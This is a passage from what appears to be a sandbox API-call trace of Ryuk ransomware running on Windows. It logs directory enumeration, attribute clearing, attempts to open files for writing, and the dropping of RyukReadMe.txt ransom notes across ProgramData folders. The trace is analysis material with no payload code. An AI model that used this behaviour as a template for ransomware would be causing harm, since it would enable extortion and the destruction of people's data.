dwFileAttributes=0x80) returned 0 [0159.548] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.548] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.548] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.548] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.548] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.548] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico", dwFileAttributes=0x80) returned 0 [0159.548] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.548] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.548] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.548] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.549] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.549] SetLastError (dwErrCode=0x0) [0159.549] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.549] GetLastError () returned 0x5 [0159.549] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.549] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.549] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.549] SetLastError (dwErrCode=0x0) [0159.549] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.549] GetLastError () returned 0x5 [0159.549] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.549] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.549] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.550] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.550] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.550] SetLastError (dwErrCode=0x0) [0159.550] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.550] GetLastError () returned 0x5 [0159.550] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.550] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.550] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0159.550] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.550] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.550] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.556] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml", dwFileAttributes=0x80) returned 0 [0159.556] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.556] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.556] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.557] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0159.557] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0159.557] SetLastError (dwErrCode=0x0) [0159.557] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.557] GetLastError () returned 0x5 [0159.557] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.557] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.557] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.557] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.557] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico", dwFileAttributes=0x80) returned 0 [0159.557] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.557] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.557] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.557] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.558] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.558] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico", dwFileAttributes=0x80) returned 0 [0159.558] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.558] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.558] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.558] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.558] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.558] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico", dwFileAttributes=0x80) returned 0 [0159.558] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.558] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.559] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.559] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.559] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.559] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico", dwFileAttributes=0x80) returned 0 [0159.559] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.559] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.559] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.559] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.559] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.559] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico", dwFileAttributes=0x80) returned 0 [0159.560] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.560] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.560] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.560] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.560] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.560] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico", dwFileAttributes=0x80) returned 0 [0159.560] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.560] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.560] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.560] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.560] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.561] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico", dwFileAttributes=0x80) returned 0 [0159.561] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.561] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.561] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.561] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.561] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.561] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml", dwFileAttributes=0x80) returned 0 [0159.561] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.561] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.561] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.562] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.562] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.562] SetLastError (dwErrCode=0x0) [0159.562] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.562] GetLastError () returned 0x5 [0159.562] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.562] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.562] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.562] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.562] SetLastError (dwErrCode=0x0) [0159.562] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.562] GetLastError () returned 0x5 [0159.562] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.562] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.562] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.562] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.562] SetLastError (dwErrCode=0x0) [0159.562] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.562] GetLastError () returned 0x5 [0159.563] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.563] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.563] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.563] SetLastError (dwErrCode=0x0) [0159.563] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.563] GetLastError () returned 0x5 [0159.563] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.563] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.563] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\DeviceSync\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.563] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.563] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.563] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.563] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.563] SetLastError (dwErrCode=0x0) [0159.563] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\DeviceSync\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\devicesync\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0159.563] GetLastError () returned 0xb7 [0159.563] CloseHandle (hObject=0x188) returned 1 [0159.564] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.564] SetLastError (dwErrCode=0x0) [0159.564] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.564] GetLastError () returned 0x5 [0159.564] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.564] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.564] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\DRM\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.564] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.564] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.564] SetLastError (dwErrCode=0x0) [0159.564] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\DRM\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\drm\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.564] GetLastError () returned 0x5 [0159.564] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.564] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.564] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.564] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.564] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.565] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.565] SetLastError (dwErrCode=0x0) [0159.565] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\drm\\server\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.565] GetLastError () returned 0x5 [0159.565] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.565] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.565] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.565] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.565] SetLastError (dwErrCode=0x0) [0159.565] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\DRM\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\drm\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.565] GetLastError () returned 0x5 [0159.565] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.565] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.565] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.565] SetLastError (dwErrCode=0x0) [0159.565] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.565] GetLastError () returned 0x5 [0159.565] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.565] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.565] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\eHome\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.566] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.566] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.566] SetLastError (dwErrCode=0x0) [0159.566] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\eHome\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\ehome\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0159.566] GetLastError () returned 0xb7 [0159.566] CloseHandle (hObject=0x18c) returned 1 [0159.566] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.566] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.566] FindNextFileW (in: 